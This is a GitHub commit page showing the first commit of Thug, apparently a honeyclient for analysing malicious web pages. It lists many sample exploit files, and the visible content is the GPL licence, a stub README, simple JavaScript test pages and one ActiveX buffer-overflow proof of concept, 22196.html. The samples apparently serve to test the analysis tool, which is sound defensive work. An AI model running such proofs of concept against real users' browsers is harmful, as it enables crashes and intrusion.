Skip to content
Browse files

First commit

  • Loading branch information...
0 parents commit 82c455dbe44bc1688622a1b606ebac7198b8c2e7 @buffer committed May 8, 2011
Showing with 9,108 additions and 0 deletions.
  1. +340 −0 COPYING
  2. +36 −0 README
  3. +15 −0 samples/AST/test1.html
  4. +20 −0 samples/AST/test2.html
  5. +23 −0 samples/AST/test3.html
  6. +51 −0 samples/AST/test99.html
  7. +18 −0 samples/exploits/22196.html
  8. +28 −0 samples/exploits/22811_Elazar.html
  9. +67 −0 samples/exploits/2448.html
  10. +47 −0 samples/exploits/2575.html
  11. +47 −0 samples/exploits/2mix.html
  12. +38 −0 samples/exploits/3420.html
  13. BIN samples/exploits/36488084.sc
  14. BIN samples/exploits/39973780.sc
  15. +44 −0 samples/exploits/4042.html
  16. +32 −0 samples/exploits/4043.html
  17. +24 −0 samples/exploits/4148.html
  18. +76 −0 samples/exploits/4149.html
  19. +131 −0 samples/exploits/4158.html
  20. +40 −0 samples/exploits/4226.html
  21. +19 −0 samples/exploits/4230.html
  22. +17 −0 samples/exploits/4237.html
  23. +50 −0 samples/exploits/4250.html
  24. +49 −0 samples/exploits/4351.html
  25. +56 −0 samples/exploits/4420.html
  26. +29 −0 samples/exploits/4427.html
  27. +44 −0 samples/exploits/4594.html
  28. +20 −0 samples/exploits/4613.html
  29. +59 −0 samples/exploits/4663.html
  30. +39 −0 samples/exploits/4829.html
  31. +30 −0 samples/exploits/4869.html
  32. +44 −0 samples/exploits/4874.html
  33. +33 −0 samples/exploits/4875.html
  34. +71 −0 samples/exploits/4894.html
  35. +31 −0 samples/exploits/4903.html
  36. +35 −0 samples/exploits/4909.html
  37. +79 −0 samples/exploits/4918.html
  38. +82 −0 samples/exploits/4932.html
  39. +120 −0 samples/exploits/4967.html
  40. +21 −0 samples/exploits/4974.html
  41. +120 −0 samples/exploits/4979.html
  42. +120 −0 samples/exploits/4982.html
  43. +33 −0 samples/exploits/4986.html
  44. +118 −0 samples/exploits/4987.html
  45. +121 −0 samples/exploits/5025.html
  46. +49 −0 samples/exploits/5043.html
  47. +37 −0 samples/exploits/5045.html
  48. +132 −0 samples/exploits/5049.html
  49. +121 −0 samples/exploits/5051.html
  50. +119 −0 samples/exploits/5052.html
  51. +37 −0 samples/exploits/5153.html
  52. +31 −0 samples/exploits/5188.html
  53. +118 −0 samples/exploits/5190.html
  54. +75 −0 samples/exploits/5193.html
  55. +122 −0 samples/exploits/5205.html
  56. +22 −0 samples/exploits/5217.html
  57. +70 −0 samples/exploits/5225.html
  58. +69 −0 samples/exploits/5264.html
  59. +69 −0 samples/exploits/5271.html
  60. +50 −0 samples/exploits/5272.html
  61. +355 −0 samples/exploits/55875.html
  62. +69 −0 samples/exploits/ARCserve_AddColumn_BoF.html
  63. +101 −0 samples/exploits/AnswerWorks.htm
  64. +15 −0 samples/exploits/BaiduBar.htm
  65. +20 −0 samples/exploits/BitDefender.htm
  66. +33 −0 samples/exploits/CABrightStor.htm
  67. +9 −0 samples/exploits/CVE-2008-1309-Real.html
  68. +11 −0 samples/exploits/Comodo.htm
  69. +64 −0 samples/exploits/ConnectAndEnterRoom.htm
  70. +27 −0 samples/exploits/CreativeSoftAttack.htm
  71. +50 −0 samples/exploits/DLinkMPEG.htm
  72. +18 −0 samples/exploits/DPClient.htm
  73. +20 −0 samples/exploits/DVRHOSTWeb.htm
  74. +25 −0 samples/exploits/DirectShow.htm
  75. +16 −0 samples/exploits/DivX.htm
  76. +142 −0 samples/exploits/Domino.htm
  77. +107 −0 samples/exploits/FileUploader.htm
  78. +62 −0 samples/exploits/GLIEDown2.htm
  79. +19 −0 samples/exploits/GatewayWeblaunch.htm
  80. +15 −0 samples/exploits/GomWeb.htm
  81. +19 −0 samples/exploits/HPInfo_GetRegValue.htm
  82. +29 −0 samples/exploits/HPInfo_LaunchApp.htm
  83. +23 −0 samples/exploits/HPInfo_SetRegValue.htm
  84. +35 −0 samples/exploits/IMWebControl.htm
  85. +29 −0 samples/exploits/JetAudioDownloadFromMusicStore.htm
  86. +9 −0 samples/exploits/Kingsoft.htm
  87. +13 −0 samples/exploits/MacrovisionFlexNet.htm
  88. +59 −0 samples/exploits/MicrosoftWorks7Attack.htm
  89. +113 −0 samples/exploits/Move.htm
  90. +110 −0 samples/exploits/MyspaceUploader.htm
  91. +54 −0 samples/exploits/NCTAudioFile2.htm
  92. +23 −0 samples/exploits/NamoInstaller.htm
  93. +93 −0 samples/exploits/NeoTracePro.htm
  94. +32 −0 samples/exploits/NessusScanCtrl.htm
  95. +58 −0 samples/exploits/OurgameGLWorld.htm
  96. +16 −0 samples/exploits/OurgameGLWorld.html
  97. +57 −0 samples/exploits/PPlayer.htm
  98. +61 −0 samples/exploits/PTZCamPanel.htm
  99. +301 −0 samples/exploits/Pps.html
  100. +108 −0 samples/exploits/QuantumStreaming.htm
  101. +37 −0 samples/exploits/RDSDataSpace.htm
  102. +16 −0 samples/exploits/RediffBolDownloaderAttack.htm
  103. +14 −0 samples/exploits/RegistryPro.htm
  104. +50 −0 samples/exploits/RtspVaPgCtrl.htm
  105. +13 −0 samples/exploits/SSReaderPdg2_LoadPage.htm
  106. +43 −0 samples/exploits/SSReaderPdg2_Register.htm
  107. +11 −0 samples/exploits/SinaDLoader.htm
  108. +24 −0 samples/exploits/SonicWallNetExtenderAddRouteEntry.htm
  109. +32 −0 samples/exploits/StormConfig.htm
  110. +56 −0 samples/exploits/StreamAudioChainCast.htm
  111. +121 −0 samples/exploits/SymantecBackupExec.htm
  112. +54 −0 samples/exploits/Toshiba.htm
  113. +15 −0 samples/exploits/UUSeeUpdate.htm
  114. +23 −0 samples/exploits/UniversalUpload.htm
  115. +37 −0 samples/exploits/VLC.htm
  116. +64 −0 samples/exploits/WMEncProfileManager.htm
  117. +53 −0 samples/exploits/WinZip.htm
  118. +20 −0 samples/exploits/Xupload.htm
  119. +118 −0 samples/exploits/YahooJukebox.htm
  120. +48 −0 samples/exploits/YahooMessengerYVerInfo.htm
  121. +43 −0 samples/exploits/YahooMessengerYwcvwr_GetComponentVersion.htm
  122. +31 −0 samples/exploits/YahooMessengerYwcvwr_server.htm
  123. +33 −0 samples/exploits/ZenturiProgramCheckerAttack.htm
  124. +19 −0 samples/exploits/aol_ampx.html
  125. +1 −0 samples/exploits/bindshell.sc
  126. +23 −0 samples/exploits/domino.html
  127. +34 −0 samples/exploits/gom.html
  128. +32 −0 samples/exploits/hpinfo.html
  129. +36 −0 samples/exploits/hpinfo1.html
  130. +28 −0 samples/exploits/hpinfo2.html
  131. +19 −0 samples/exploits/hpinfo3.html
  132. +27 −0 samples/exploits/hpupdate1.html
  133. +87 −0 samples/exploits/hpupdate2.html
  134. +33 −0 samples/exploits/inner_html_example.html
  135. +168 −0 samples/exploits/intuit.html
  136. +24 −0 samples/exploits/ms09002-mod.html
  137. +10 −0 samples/exploits/msrichtxt.html
  138. +66 −0 samples/exploits/qvod.html
  139. +26 −0 samples/exploits/qvod.js
  140. +52 −0 samples/exploits/qvodctl-2.html
  141. +11 −0 samples/exploits/qvodctl.html
  142. +42 −0 samples/exploits/qvodsrc.html
  143. +87 −0 samples/exploits/realplayer-mod.html
  144. +110 −0 samples/exploits/rgod_imesh.html
  145. +1 −0 samples/exploits/runcalc.sc
  146. +58 −0 samples/exploits/show-283-1.html
  147. +42 −0 samples/exploits/ssreader2.html
  148. +48 −0 samples/exploits/ssreader_0day.html
  149. +42 −0 samples/exploits/ssreader_noplus.html
  150. +15 −0 samples/exploits/storm_URL.htm
  151. +15 −0 samples/exploits/storm_advancedOpen.htm
  152. +15 −0 samples/exploits/storm_backImage.htm
  153. +15 −0 samples/exploits/storm_isDVDPath.htm
  154. +23 −0 samples/exploits/storm_nov10.html
  155. +15 −0 samples/exploits/storm_rawParse.htm
  156. +15 −0 samples/exploits/storm_titleImage.htm
  157. +79 −0 samples/exploits/stormplayer.html
  158. +227 −0 samples/exploits/testEvents.html
  159. +63 −0 samples/exploits/toshiba.html
  160. +100 −0 samples/exploits/xupload-2.html
  161. +22 −0 samples/exploits/xupload.html
  162. +185 −0 src/AST/AST.py
  163. +179 −0 src/AST/JavaScript.tokens
Sorry, we could not display the entire diff because it was too big.
340 COPYING
@@ -0,0 +1,340 @@
+
+ GNU GENERAL PUBLIC LICENSE
+ Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.
+ 59 Temple Place, Suite 330, Boston, MA 02111 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+ Preamble
+
+ The licenses for most software are designed to take away your
+freedom to share and change it. By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users. This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it. (Some other Free Software Foundation software is covered by
+the GNU Library General Public License instead.) You can apply it to
+your programs, too.
+
+ When we speak of free software, we are referring to freedom, not
+price. Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+ To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+ For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have. You must make sure that they, too, receive or can get the
+source code. And you must show them these terms so they know their
+rights.
+
+ We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+ Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software. If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+ Finally, any free program is threatened constantly by software
+patents. We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary. To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+ The precise terms and conditions for copying, distribution and
+modification follow.
+
+ GNU GENERAL PUBLIC LICENSE
+ TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+ 0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License. The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language. (Hereinafter, translation is included without limitation in
+the term "modification".) Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope. The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+ 1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+ 2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+ a) You must cause the modified files to carry prominent notices
+ stating that you changed the files and the date of any change.
+
+ b) You must cause any work that you distribute or publish, that in
+ whole or in part contains or is derived from the Program or any
+ part thereof, to be licensed as a whole at no charge to all third
+ parties under the terms of this License.
+
+ c) If the modified program normally reads commands interactively
+ when run, you must cause it, when started running for such
+ interactive use in the most ordinary way, to print or display an
+ announcement including an appropriate copyright notice and a
+ notice that there is no warranty (or else, saying that you provide
+ a warranty) and that users may redistribute the program under
+ these conditions, and telling the user how to view a copy of this
+ License. (Exception: if the Program itself is interactive but
+ does not normally print such an announcement, your work based on
+ the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole. If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works. But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+ 3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+ a) Accompany it with the complete corresponding machine-readable
+ source code, which must be distributed under the terms of Sections
+ 1 and 2 above on a medium customarily used for software interchange; or,
+
+ b) Accompany it with a written offer, valid for at least three
+ years, to give any third party, for a charge no more than your
+ cost of physically performing source distribution, a complete
+ machine-readable copy of the corresponding source code, to be
+ distributed under the terms of Sections 1 and 2 above on a medium
+ customarily used for software interchange; or,
+
+ c) Accompany it with the information you received as to the offer
+ to distribute corresponding source code. (This alternative is
+ allowed only for noncommercial distribution and only if you
+ received the program in object code or executable form with such
+ an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it. For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable. However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+ 4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License. Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+ 5. You are not required to accept this License, since you have not
+signed it. However, nothing else grants you permission to modify or
+distribute the Program or its derivative works. These actions are
+prohibited by law if you do not accept this License. Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+ 6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions. You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+ 7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License. If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all. For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices. Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+ 8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded. In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+ 9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time. Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number. If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation. If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+ 10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission. For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this. Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+ NO WARRANTY
+
+ 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+ 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+ END OF TERMS AND CONDITIONS
+
+ Appendix: How to Apply These Terms to Your New Programs
+
+ If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+ To do so, attach the following notices to the program. It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+ <one line to give the program's name and a brief idea of what it does.>
+ Copyright (C) 19yy <name of author>
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111 USA
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+ Gnomovision version 69, Copyright (C) 19yy name of author
+ Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary. Here is a sample; alter the names:
+
+ Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+ `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+ <signature of Ty Coon>, 1 April 1989
+ Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs. If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library. If this is what you want to do, use the GNU Library General
+Public License instead of this License.
36 README
@@ -0,0 +1,36 @@
+
+Thug
+====
+
+
+Requirements
+============
+
+- Python 2.5 or later
+ http://www.python.org/
+- Google V8
+ http://code.google.com/p/v8/
+- PyV8
+ http://code.google.com/p/pyv8/
+- Libemu
+ http://libemu.carnivore.it/
+- Pylibemu
+ https://github.com/buffer/pylibemu
+
+
+Installation
+============
+
+
+Usage
+=====
+
+
+License information
+===================
+
+Copyright (C) 2011 Angelo Dell'Aera <buffer@antifork.org>
+
+License: GNU Lesser General Public License, version 3 or later; see COPYING.txt
+ included in this archive for details.
+
15 samples/AST/test1.html
@@ -0,0 +1,15 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+var s = "foo";
+var i = 10;
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
20 samples/AST/test2.html
@@ -0,0 +1,20 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
23 samples/AST/test3.html
@@ -0,0 +1,23 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 0;
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+</body>
+</html>
51 samples/AST/test99.html
@@ -0,0 +1,51 @@
+<html>
+<head>
+
+<title>onload test</title>
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+ var j = 0;
+ var ar = Array('a', 'b', 'c');
+ s += "bar";
+ i = i - 6;
+
+ if (i > 100) {
+ alert("Mmmmh");
+ }
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+
+ do {
+ s += "b";
+ j += 2;
+ i--;
+ } while (i > 1);
+
+ while (t > 0) {
+ s += "c";
+ t--;
+ }
+
+ for (a in ar) {
+ alert(a);
+ }
+
+ alert(s);
+ return 0;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>The load event fires when the document has finished loading!</p>
+</body>
+</html>
18 samples/exploits/22196.html
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title> PoC 79 Exe's / IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w By InTeL </title>
+<!-- via http://downloads.securityfocus.com/vulnerabilities/exploits/22196.c -->
+</head>
+
+<body>
+<object classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" id="pwnage">
+</object>
+<script>
+
+pwnage.SetFormatLikeSample("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA